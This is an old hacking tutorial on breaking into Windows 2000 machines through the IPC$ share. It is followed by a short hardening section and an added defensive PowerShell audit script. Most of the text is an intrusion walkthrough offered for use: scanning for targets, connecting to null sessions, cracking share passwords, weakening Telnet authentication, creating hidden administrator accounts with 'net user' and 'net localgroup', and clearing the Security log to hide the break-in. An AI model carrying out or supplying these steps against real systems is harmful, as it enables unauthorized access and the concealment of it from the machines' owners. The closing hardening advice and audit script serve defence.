Hacking a Windows 2000 system through IPC$ by LLNK
1: Scanning for open Win2k systems
2: Connecting to the IPC$
3: Connecting using Computer Management
4: Disable NTLM
5: Starting the Telnet service
6: Creating user accounts and adding them to a group
7: Covering your tracks
8: How to protect your Win2k system from this attack
-----------------------------------------------------------------------------------------------------
You need to be running a Win2k system, with these tools:
Superscan version 3.00 by Foundstone (246KB)
NetBrute Scanner 1.0.0.7 (247KB)
PQWak V1.0 (24KB)
----------------------------------------------------------------------------------------------------
1: Scanning for open Win2k systems
A. Open SuperScan 2.05 (port scanner)
B. Select an IP range
C. Check "Only scan responsive pings" and "All selected ports in list"
D. Only scan ports 139 (NetBIOS) and 1025 (Network Blackjack)
E. When a system with both NetBIOS and Blackjack open is found, open NetBrute and scan that IP to see if there is an IPC$ share
2: Connecting to the IPC$
A. Open a DOS window
B. Type in:
net use \\ipaddress\ipc$ "" /user:administrator
C. If you connect to the system, it will say "The command completed successfully"
D. If it says bad username or password, try running PQWak.exe to crack the share password. Then insert the password like so:
net use \\ipaddress\ipc$ "password" /user:administrator
E. Users usually have only one password for everything, so try the c$ share password as the administrator password to connect to the IPC$
3: Connecting using Computer Management
A. Open Computer Management.
B. Click Action, then Connect to Another Computer
C. Type in the IP address.
4: Disable NTLM
A. Open regedit
B. Connect to the following registry value:
HKEY_LOCAL_MACHINE\Software\Microsoft\Telnet Server\1.0\NTLM
C. Set the value data from (2) to (1)
D. That will enable login to the telnet server without being connected to the IPC$ or a trusted domain.
5: Starting the Telnet service
A. In Computer Management, click Services and Applications
B. Click Services
C. Right-click the Telnet service and open Properties
D. Set the service to Automatic, and start the service
6: Creating user accounts and adding them to a group
A. Open a DOS window, and type the following:
telnet IPaddress
B. If prompted for a username and password, type Administrator with no password.
C. To create a user account, type the following:
net user username password /add
D. Replace username and password with whatever you like.
E. To add the user account to the administrators group, type the following:
net localgroup administrators username /add
or, for a domain group:
net group administrators username /add
7: Covering your tracks
A. Open a DOS window, and type the following:
net use \\ipaddress\ipc$ /delete
B. While connected in Computer Management, check in Event Viewer whether the Security log is being audited. If it is, clear it. :-)
8: How to protect your Win2k system from this attack
A. Open Regedit
B. Connect to the following value:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\restrictanonymous
C. Change the "Value Data" from 0 to 1. It should then show 0x00000001 (1)
D. That will disable remote logon to a null IPC$
E. Always have a complicated administrator password, with Windows 2000 or any other OS
F. Install a firewall. www.zonealarm.com
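The settings from step 8, together with the telnet settings the earlier steps change, gathered into an added PowerShell audit script; it is not part of LLNK's tutorial and assumes a Windows host that has PowerShell, the telnet service name TlntSvr, and the registry paths named on this page (Windows 2000 itself has no PowerShell, so there the same values are read in regedit).

```powershell
param([switch]$Fix)   # -Fix applies the page's own remediations instead of only reporting
$Findings = @()

# 1. RestrictAnonymous (step 8). 0 = anonymous (null IPC$) sessions may enumerate
#    users and shares, 1 = enumeration restricted, 2 = null-session access refused
#    (the value 2 exists from Windows 2000 on).
$lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$ra  = (Get-ItemProperty -Path $lsa -ErrorAction SilentlyContinue).RestrictAnonymous
if (-not $ra) {
    $Findings += "RestrictAnonymous is '$ra' (null IPC$ enumeration allowed); set it to 1 or 2"
    if ($Fix) { Set-ItemProperty -Path $lsa -Name RestrictAnonymous -Value 1 -Type DWord }
}

# 2. Telnet Server authentication (step 4). The page writes the key as 'Telnet Server';
#    the documented key name is TelnetServer. NTLM: 2 = NTLM only, 1 = NTLM with
#    clear-text fallback, 0 = clear-text only. Step 4 is an attacker lowering 2 to 1.
$tel = 'HKLM:\SOFTWARE\Microsoft\TelnetServer\1.0'
if (Test-Path $tel) {
    $ntlm = (Get-ItemProperty -Path $tel).NTLM
    if ($ntlm -ne 2) {
        $Findings += "Telnet NTLM is '$ntlm'; expected 2 (NTLM only)"
        if ($Fix) { Set-ItemProperty -Path $tel -Name NTLM -Value 2 -Type DWord }
    }
}

# 3. Telnet service (step 5). Service name TlntSvr is an assumption; it should be
#    neither running nor set to Automatic unless the host deliberately offers telnet.
$svc = Get-Service -Name TlntSvr -ErrorAction SilentlyContinue
if ($svc) {
    $mode = (Get-CimInstance Win32_Service -Filter "Name='TlntSvr'").StartMode
    if ($svc.Status -eq 'Running' -or $mode -eq 'Auto') {
        $Findings += "Telnet service is $($svc.Status), start mode $mode; stop and disable it"
        if ($Fix) { Stop-Service TlntSvr -Force; Set-Service TlntSvr -StartupType Disabled }
    }
}

# 4. Security log (step 7). An empty Security log is itself a finding: either logon
#    auditing is off or someone cleared it (the clearing is recorded as event 517 on
#    Windows 2000 and event 1102 on Vista and later).
$sec = Get-WinEvent -ListLog Security -ErrorAction SilentlyContinue
if ($sec -and $sec.RecordCount -eq 0) {
    $Findings += "Security event log is empty; enable logon/logoff auditing and look for log-cleared events"
}

if ($Findings.Count -eq 0) { 'No findings: host is hardened against the steps described above' }
else { $Findings | ForEach-Object { "FINDING: $_" } }
```

Run it as an administrator; without -Fix it only reports, so it is safe to run first and review before applying anything.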
Credits
LLNK #Hackerz on DALnet <llnk19@hushmail.com>